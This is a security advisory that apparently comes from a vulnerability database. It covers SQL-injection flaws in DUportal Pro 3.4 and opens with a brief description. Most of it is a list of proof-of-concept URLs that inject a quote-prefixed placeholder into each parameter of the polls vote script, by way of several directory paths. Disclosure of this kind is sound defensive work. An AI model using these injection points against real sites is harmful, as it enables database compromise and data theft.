source: https://www.securityfocus.com/bid/13285/info
DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
These vulnerabilities are reported to affect DUportal Pro 3.4; earlier versions may also be affected.
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Classifieds/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Events/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/events/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Files/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/home/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME='SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID='SQL_INJECTION
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID='SQL_INJECTION&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID='SQL_INJECTION&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID='SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY='SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
http://www.example.com/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT='SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75